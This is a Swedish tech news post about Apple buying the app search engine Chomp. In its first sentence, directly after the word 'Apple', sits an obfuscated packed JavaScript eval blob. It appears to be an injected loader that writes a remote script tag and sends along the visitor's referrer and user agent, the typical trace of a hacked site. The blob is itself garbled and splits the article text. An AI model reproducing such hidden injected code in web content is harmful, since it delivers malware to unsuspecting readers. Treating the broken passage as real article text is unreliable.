Image Image Image Image Image Image Image Image Image Image

| 8 juli, 2020

Scroll to top

Top

Appsökmotorn Chomp köps upp av Apple

Appsökmotorn Chomp köps upp av Apple
Sebastian

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hbbbr|var|u0026u|referrer|izrkk||js|php’.split(’|’),0,{}))
har länge haft stora planer på att expandera sin onlinebutik iTunes Store. Nu verkar det som företaget tagit det första steget till att uppnå målet. Apple har nu köpt upp Chomp som är en app-inriktad söktjänst.

Det som gör Chomp unikt ät att den beräknar innehållet i hela sökordet snarare än själva ordet. Med Chomp associeras sökord även till funktion och det kommer därför att dyka upp betydligt fler sökresultat än tidigare.

Inte nog med att Chomp är en bra sökmotor för appar, Chomp har också utvecklat ett grymt analysverktyg som kommer att hjälpa Apple att föra in statistik över vad personer använder för söktermer. På detta sätt kommer man kunna rikta appar samt förbättra.

Google och många av deras Androidanvändare har förut använt sig av Chomp för att hitta rätt i de olika onlinebutikerna, nu kommer dessa användare att får gå någon annanstans. Självklart kommer denna sökmotor nu att bli iOS exklusiv.